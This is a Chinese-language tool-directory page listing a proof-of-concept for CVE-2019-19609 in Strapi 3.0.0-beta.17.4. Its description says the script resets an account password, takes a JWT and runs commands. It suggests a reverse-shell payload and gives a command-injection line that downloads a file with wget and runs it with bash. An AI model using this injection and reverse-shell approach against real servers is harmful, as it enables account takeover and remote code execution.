Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-19609-POC-Python — Strapi Framework, 3.0.0-beta.17.4 | Kitploit
工具/GitHubGitHub/n000xy/cve-2019-19609-poc-python
Password AttacksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubn000xy/cve-2019-19609-poc-python

CVE-2019-19609-POC-Python

Strapi Framework, 3.0.0-beta.17.4

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

该脚本将尝试将密码重置为"updated_pass"变量中声明的值;如果成功,它将从Strapi获取一个JWT令牌,并使用该令牌执行命令。
执行绑定命令无效,除非发送反向Shell载荷(使用bash或python等)。你可以生成一个.sh文件,该文件会为你下载nc并执行它,或者任何其他内容,甚至ELF文件。为此,请将payload_exp从&&改为)。例如:&& $(wget xxxx -O /tmp/oooo; bash /tmp/ooo)
URL 不再有效。

下载工具